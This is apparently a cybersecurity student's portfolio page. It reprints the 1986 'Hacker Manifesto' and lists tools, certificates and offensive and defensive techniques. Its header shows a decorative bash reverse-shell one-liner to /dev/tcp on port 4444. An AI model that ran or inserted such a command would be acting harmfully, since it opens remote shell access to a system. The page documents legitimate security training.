ZarkosCypher

bash -i >& /dev/tcp/Loading.../4444 0>&1

Try Hack Me Hack The Box GitHub HackerOne Bugcrowd Twitter / X BlueSky

"...For this life is too short, I want to be a mother, a father, to read every book... and to experiance every career. Oh how I wish I where given a thousand lives." - Unknown


"There are only two industries that call their customers 'users': illegal drugs and software" - Edward Tufte


Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"... Damn kids. They're all alike.

But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him? I am a hacker, enter my world... Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me... Damn underachiever. They're all alike.

I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..." Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me... Or thinks I'm a smart ass... Or doesn't like teaching and shouldn't be here... Damn kid. All he does is play games. They're all alike.

And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all... Damn kid. Tying up the phone line again. They're all alike...

You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us will- ing pupils, but those few are like drops of water in the desert.

This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.

- The Mentor January 8, 1986 - phrack

About Me

Hello! I'm ZarkosCypher, a passionate cybersecurity student specializing in penetration testing and ethical hacking. I love solving complex challenges, competing in CTFs, and exploring new tools in the field of cybersecurity.

Skills

  • Penetration Testing
  • Vulnerability Assessment
  • Linux and Windows Environments
  • Networking and Protocol Analysis

Certificates

  • Practical Ethical Hacking - The Complete Course By TCM Security
  • Security Operations (SOC) 101 By TCM Security
  • Practical Phishing Campaigns By TCM Security
  • Cyber Security 101 By TryHackMe

Projects

  • List Of Write Ups: Write Up's
  • Wi-Fi Security Audit: Conducted penetration tests on a simulated network using tools like Aircrack-ng.
  • Home Lab: Built and maintained a virtualized environment to practice penetration testing and incident response.

Resources

Tools I have experiance with

  • Nmap, Nessus, NexPose 
  • Metasploit, Msfvenom 
  • Netcat
  • Hashcat, John The Ripper 
  • Hydra
  • Burp Suite
  • FFUF, DirBuster, Gobuster
  • SQL Map
  • Asset finder, Amass, Httprobe, GoWitness
  • Lin Peas, Win Peas
  • MimiKatz 
  • Responder, LDAP Domain Dump, Bloodhound, Plumhound, PingCastle
  • CyberChef, Virus Total, CAPA, REMux, FlareVM, 
  • Snort, Sericata, Zeak, Splunk, LimaCharlie, Yara, LOKI, THOR, FENRIR, YARA, Wireshark, TCP dump, FTK Imager, Volatility, Sysmon 
  • PhishTool, MalDoc Analysis , PDF Analysis, Netstat, NSLookup, Dig, VirusTotal, Hashing, WhoIs Search, CyberChef, eioc.py, oledump.py, pdf-parser.py, emldump.py

PENETRATION TESTING SKILLS (RED TEAM)

  • Penetration Testing/Red Teaming/Ethical Hacking - Report writing 
  • SQL Injection 
  • SSRF (Server Side Request Forgery) 
  • XSS (Cross Site Scripting) 
  • XXE (External Entities Injection)
  • IDOR (Insecure Direct Object Reference) 
  • Command Injection Blind / Out Of Band
  • Insecure File Upload 
  • Attacking Authentication BruitForcing and MFA
  • Manual exploitation
  • AV Evasion 
  • Reverse shells, Bind shells, Webshells 
  • Directory busting 
  • Subdomain brute forcing 
  • Proxying 
  • Pivoting 
  • Maintaining Access 
  • Cleaning Up 
  • Privilege Escalation
  • Password Cracking/Recovery 
  • MITRE (ATT&CK)
  • IPv6 Attacks and DNS Takeover via mim6 
  • LLMNR Poisoning, SMB Relay, Passback Attack, Kerberoasting, Token Impersonation, LNK File Attack, GPP / cPassword Attacks, Dumping NTDS.dit, Golden Ticket Attack 
  • Zero Logon, Print Nightmare 
  • OSINT (open source intelligence)

SECURITY OPERATIONS CENTER SKILLS (BLUE TEAM)

  • Phishing Analysis, Endpoint Security, Windows and Linux System and Network Analysis, Security Information and Event Management (SIEM), Threat Intelligence, Digital Forensics 
  • Email Systems, Functionality, and Analysis 
  • Dynamic and Static Analysis, Chain of Custody, Incident Response 
  • Logs, incident response, digital forensics, SIEM, firewalls, IDS, vulnerability scanning, 
  • CyberChef, CAPA, REMnux, FlareVM, YARA

GENERAL SKILLS

  • Microsoft 360 products and office, word, excel, outlook, PowerPoint
  • Networking knowledge 
  • Windows, Linux (Administration and General OS Knowledge) 
  • Configurations for Cisco Routers and Switches
  • Active Directory
  • Use of virtual machines
  • Googling and Google Dorking
  • Knowledge in A+
  • Docker
  • Lock Picking

CODING SKILLS

  • Python
  • Bash
  • Shell
  • PowerShell 
  • CMD
  • Rust
  • C, C#, C++
  • Java
  • Javascript
  • SQL
  • HTML
  • CSS
  • Ruby

Contact

If you'd like to contact me, feel free to reach out!